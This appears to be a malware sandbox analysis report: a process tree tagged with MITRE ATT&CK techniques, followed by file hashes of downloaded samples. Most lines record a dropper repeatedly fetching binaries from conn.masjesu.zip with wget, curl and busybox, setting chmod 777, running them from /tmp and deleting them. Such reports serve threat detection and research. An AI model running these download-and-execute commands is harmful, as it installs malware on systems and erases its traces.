/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo2⤵
- System Network Configuration Discovery
PID:959
-
-
/bin/chmodchmod 777 S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo2⤵
- File and Directory Permissions Modification
PID:960
-
-
/tmp/S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo./S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo2⤵
- Executes dropped EXE
PID:961
-
-
/bin/rmrm S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo2⤵PID:962
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq2⤵
- System Network Configuration Discovery
PID:963
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:964
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq2⤵
- System Network Configuration Discovery
PID:966
-
-
/bin/chmodchmod 777 q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq2⤵
- File and Directory Permissions Modification
PID:967
-
-
/tmp/q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq./q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq2⤵
- Executes dropped EXE
PID:968
-
-
/bin/rmrm q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq2⤵PID:969
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ2⤵
- System Network Configuration Discovery
PID:970
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:971
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ2⤵
- System Network Configuration Discovery
PID:973
-
-
/bin/chmodchmod 777 qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ2⤵
- File and Directory Permissions Modification
PID:974
-
-
/tmp/qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ./qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ2⤵
- Executes dropped EXE
PID:975
-
-
/bin/rmrm qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ2⤵PID:976
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW2⤵PID:977
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:978
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW2⤵
- System Network Configuration Discovery
PID:980
-
-
/bin/chmodchmod 777 7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW2⤵
- File and Directory Permissions Modification
PID:981
-
-
/tmp/7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW./7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW2⤵
- Executes dropped EXE
PID:982
-
-
/bin/rmrm 7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW2⤵PID:983
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd2⤵
- System Network Configuration Discovery
PID:984
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:985
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd2⤵
- System Network Configuration Discovery
PID:987
-
-
/bin/chmodchmod 777 e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd2⤵
- File and Directory Permissions Modification
PID:988
-
-
/tmp/e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd./e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd2⤵
- Executes dropped EXE
PID:989
-
-
/bin/rmrm e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd2⤵PID:990
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV2⤵
- System Network Configuration Discovery
PID:991
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:992
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV2⤵
- System Network Configuration Discovery
PID:994
-
-
/bin/chmodchmod 777 OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV2⤵
- File and Directory Permissions Modification
PID:995
-
-
/tmp/OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV./OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV2⤵
- Executes dropped EXE
PID:996
-
-
/bin/rmrm OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV2⤵PID:997
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB2⤵
- System Network Configuration Discovery
PID:998
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:999
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB2⤵PID:1001
-
-
/bin/chmodchmod 777 d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB2⤵
- File and Directory Permissions Modification
PID:1002
-
-
/tmp/d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB./d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB2⤵
- Executes dropped EXE
PID:1003
-
-
/bin/rmrm d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB2⤵PID:1004
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb2⤵PID:1005
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1006
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb2⤵PID:1008
-
-
/bin/chmodchmod 777 2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb2⤵
- File and Directory Permissions Modification
PID:1009
-
-
/tmp/2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb./2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb2⤵
- Executes dropped EXE
PID:1010
-
-
/bin/rmrm 2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb2⤵PID:1011
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU2⤵
- System Network Configuration Discovery
PID:1012
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1013
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU2⤵PID:1015
-
-
/bin/chmodchmod 777 zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU2⤵
- File and Directory Permissions Modification
PID:1016
-
-
/tmp/zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU./zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU2⤵
- Executes dropped EXE
PID:1017
-
-
/bin/rmrm zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU2⤵PID:1018
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj2⤵
- System Network Configuration Discovery
PID:1019
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1020
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj2⤵
- System Network Configuration Discovery
PID:1022
-
-
/bin/chmodchmod 777 TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj2⤵
- File and Directory Permissions Modification
PID:1023
-
-
/tmp/TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj./TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj2⤵
- Executes dropped EXE
PID:1024
-
-
/bin/rmrm TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj2⤵PID:1026
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97
-
Filesize
176B
MD5e1732e70f015e99d14dff1eeeaec9966
SHA1c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113
SHA2566de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e
SHA5126ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7